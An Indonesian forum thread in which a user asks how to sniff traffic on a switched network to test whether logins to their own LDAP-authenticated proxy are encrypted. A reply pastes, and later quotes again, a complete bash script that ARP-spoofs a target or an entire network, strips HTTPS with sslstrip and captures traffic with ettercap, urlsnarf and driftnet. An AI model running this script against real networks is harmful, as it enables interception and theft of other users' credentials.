help me, uji coba sniffing paket data.....
#1
abang",brother"...mnta bantuannya dnk...
mw tanya ne, bagaimana cara sniffing pada sebuah jaringan yang menggunakan switch...
mau uji coba keamanan proxy yang saya buaat ne...

thaks,..

#2
setau ane proxy ga bisa menghalangi sniffing, yg bisa itu mac-address dan arp filtering bro

#3
(01-11-2012, 06:43 PM)konspirasi Wrote: setau ane proxy ga bisa menghalangi sniffing, yg bisa itu mac-address dan arp filtering bro

hoo oh,,kalu mau amankan pake iptables dah,.,sekalian bisa nangkal arp flood sama sekalian bisa jadi firewall

CMIIW
SmileSmile

#4
gk ngaruh om, slama masih dalam satu IP public yg sama dan memiliki ip lokal dengan segmen yg sama sih bisa2 aja gk ngaruh switch sberapa banyak juga. paling gk jaringannya jadi sibuk, itu kalo yg jaringannya juga kurang bagus Smile
[shcode=This_site_xss-ed]

#5
(01-11-2012, 08:56 PM)junior.riau18 Wrote:
(01-11-2012, 06:43 PM)konspirasi Wrote: setau ane proxy ga bisa menghalangi sniffing, yg bisa itu mac-address dan arp filtering bro

hoo oh,,kalu mau amankan pake iptables dah,.,sekalian bisa nangkal arp flood sama sekalian bisa jadi firewall

CMIIW
SmileSmile

mksdnya, q kn bwt otentikasi proxy dengan LDAP...
nah untuk uji cobanya q pengen ngliat paket data yang lewwaat, saat pengguna memasukkan username dan pass...
pada saat dlakukan sniffing, passwrd yg tercapture terenkripsi atau enggak...

hehe, mnta pencarahaanya, maklum pengguna baru...
(01-11-2012, 11:49 PM)koecroet Wrote: gk ngaruh om, slama masih dalam satu IP public yg sama dan memiliki ip lokal dengan segmen yg sama sih bisa2 aja gk ngaruh switch sberapa banyak juga. paling gk jaringannya jadi sibuk, itu kalo yg jaringannya juga kurang bagus Smile

kmren udah nyoba' sniffing menggunakan ettercap..
tp saat dstart yg tercapture hanya dhcp dr ip target yg kita tentukan, untuk HTTPnya g tercapture...

pake wireshark jg gtu, yg tercapture dri host-host yg tercapture hanya udp, icmp,ssdp,..
sedangkan protokol http yg tercapture hanya dr host yg mlakukan sniff...

#6
wah klo pake LDAP ya ga bisa disniff bro Big Grin

boleh dong dibagi tutorialnya dimari bro, kayaknya keren nih, yg dipake OpenLDAP bukan?

autentikasi LDAP nya pake semacam RADIUS kah? n proxy nya pake squid?

atau autentikasinya langsung dari login OS nya?

setau ane LDAP itu autentikasinya menggunakan SSL/TLS jadi susah utk dilihat di wireshark/tcpdump, memang loginnya menggunakan HTTP/HTTPS tapi LDAP mengirim datanya via port 389 atau 636

coba lihat di wireshark/tcpdump port 389 n 636 nya? seharusnya ada trafik SSL disana


#7
(01-12-2012, 02:22 AM)adhenk Wrote:
(01-11-2012, 08:56 PM)junior.riau18 Wrote:
(01-11-2012, 06:43 PM)konspirasi Wrote: setau ane proxy ga bisa menghalangi sniffing, yg bisa itu mac-address dan arp filtering bro

hoo oh,,kalu mau amankan pake iptables dah,.,sekalian bisa nangkal arp flood sama sekalian bisa jadi firewall

CMIIW
SmileSmile

mksdnya, q kn bwt otentikasi proxy dengan LDAP...
nah untuk uji cobanya q pengen ngliat paket data yang lewwaat, saat pengguna memasukkan username dan pass...
pada saat dlakukan sniffing, passwrd yg tercapture terenkripsi atau enggak...

hehe, mnta pencarahaanya, maklum pengguna baru...
(01-11-2012, 11:49 PM)koecroet Wrote: gk ngaruh om, slama masih dalam satu IP public yg sama dan memiliki ip lokal dengan segmen yg sama sih bisa2 aja gk ngaruh switch sberapa banyak juga. paling gk jaringannya jadi sibuk, itu kalo yg jaringannya juga kurang bagus Smile

kmren udah nyoba' sniffing menggunakan ettercap..
tp saat dstart yg tercapture hanya dhcp dr ip target yg kita tentukan, untuk HTTPnya g tercapture...

pake wireshark jg gtu, yg tercapture dri host-host yg tercapture hanya udp, icmp,ssdp,..
sedangkan protokol http yg tercapture hanya dr host yg mlakukan sniff...



(01-12-2012, 06:30 AM)konspirasi Wrote: wah klo pake LDAP ya ga bisa disniff bro Big Grin

boleh dong dibagi tutorialnya dimari bro, kayaknya keren nih, yg dipake OpenLDAP bukan?

autentikasi LDAP nya pake semacam RADIUS kah? n proxy nya pake squid?

atau autentikasinya langsung dari login OS nya?

setau ane LDAP itu autentikasinya menggunakan SSL/TLS jadi susah utk dilihat di wireshark/tcpdump, memang loginnya menggunakan HTTP/HTTPS tapi LDAP mengirim datanya via port 389 atau 636

coba lihat di wireshark/tcpdump port 389 n 636 nya? seharusnya ada trafik SSL disana

nah kalo LDAP mengirim data lewat port 389 n 636,,ya gak ke capture,,soal nya si kalo g salah ettercap capturenya port 80 or 8080,,

mungkin anda bisa gunakan script sniff ini
Spoiler! :

Code:
#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT5
# BY gHero,cseven,spudgunman.
# Ver 0.3

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
/  ___//    \|  \   __\\   __\     /  ___/  |  \
\___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'


echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'; bash' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'; bash' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt ; bash' &

# DRIFTNET
driftnet -p -i $INT &


disitu ada command iptable "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000"

nah coba anda bermain di destination-portnya,,
mudahan2 bisa membantu

CMIIW yah bro ,,maklum ane juga masih new ubie,, Big Grin

#8
dicoba sendiri dulu gmn bro???

#9
siapa yang coba bro????,,

#10
(01-12-2012, 06:30 AM)konspirasi Wrote: wah klo pake LDAP ya ga bisa disniff bro Big Grin

boleh dong dibagi tutorialnya dimari bro, kayaknya keren nih, yg dipake OpenLDAP bukan?

autentikasi LDAP nya pake semacam RADIUS kah? n proxy nya pake squid?

atau autentikasinya langsung dari login OS nya?

setau ane LDAP itu autentikasinya menggunakan SSL/TLS jadi susah utk dilihat di wireshark/tcpdump, memang loginnya menggunakan HTTP/HTTPS tapi LDAP mengirim datanya via port 389 atau 636

coba lihat di wireshark/tcpdump port 389 n 636 nya? seharusnya ada trafik SSL disana

yupz benar....
untuk osnya itu bysanya untuk untuk otentikasi samba menggunakan ldap...
dan dalam percobaan ini saya hanya menggunakan otentikasi https...

dan ini bingung gmn cara uji cobanya...untuk ngliat paket data yang lewat....termasuk username dan password saat pengguna login....
(01-12-2012, 06:59 AM)junior.riau18 Wrote:
(01-12-2012, 02:22 AM)adhenk Wrote:
(01-11-2012, 08:56 PM)junior.riau18 Wrote:
(01-11-2012, 06:43 PM)konspirasi Wrote: setau ane proxy ga bisa menghalangi sniffing, yg bisa itu mac-address dan arp filtering bro

hoo oh,,kalu mau amankan pake iptables dah,.,sekalian bisa nangkal arp flood sama sekalian bisa jadi firewall

CMIIW
SmileSmile

mksdnya, q kn bwt otentikasi proxy dengan LDAP...
nah untuk uji cobanya q pengen ngliat paket data yang lewwaat, saat pengguna memasukkan username dan pass...
pada saat dlakukan sniffing, passwrd yg tercapture terenkripsi atau enggak...

hehe, mnta pencarahaanya, maklum pengguna baru...
(01-11-2012, 11:49 PM)koecroet Wrote: gk ngaruh om, slama masih dalam satu IP public yg sama dan memiliki ip lokal dengan segmen yg sama sih bisa2 aja gk ngaruh switch sberapa banyak juga. paling gk jaringannya jadi sibuk, itu kalo yg jaringannya juga kurang bagus Smile

kmren udah nyoba' sniffing menggunakan ettercap..
tp saat dstart yg tercapture hanya dhcp dr ip target yg kita tentukan, untuk HTTPnya g tercapture...

pake wireshark jg gtu, yg tercapture dri host-host yg tercapture hanya udp, icmp,ssdp,..
sedangkan protokol http yg tercapture hanya dr host yg mlakukan sniff...



(01-12-2012, 06:30 AM)konspirasi Wrote: wah klo pake LDAP ya ga bisa disniff bro Big Grin

boleh dong dibagi tutorialnya dimari bro, kayaknya keren nih, yg dipake OpenLDAP bukan?

autentikasi LDAP nya pake semacam RADIUS kah? n proxy nya pake squid?

atau autentikasinya langsung dari login OS nya?

setau ane LDAP itu autentikasinya menggunakan SSL/TLS jadi susah utk dilihat di wireshark/tcpdump, memang loginnya menggunakan HTTP/HTTPS tapi LDAP mengirim datanya via port 389 atau 636

coba lihat di wireshark/tcpdump port 389 n 636 nya? seharusnya ada trafik SSL disana

nah kalo LDAP mengirim data lewat port 389 n 636,,ya gak ke capture,,soal nya si kalo g salah ettercap capturenya port 80 or 8080,,

mungkin anda bisa gunakan script sniff ini
Spoiler! :

Code:
#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT5
# BY gHero,cseven,spudgunman.
# Ver 0.3

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
/  ___//    \|  \   __\\   __\     /  ___/  |  \
\___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'


echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'; bash' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'; bash' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt ; bash' &

# DRIFTNET
driftnet -p -i $INT &


disitu ada command iptable "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000"

nah coba anda bermain di destination-portnya,,
mudahan2 bisa membantu

CMIIW yah bro ,,maklum ane juga masih new ubie,, Big Grin

sipp, thaks pencerahannya....q coba dulu...
ntr q laporin hasilnya...hehehe





Users browsing this thread: 1 Guest(s)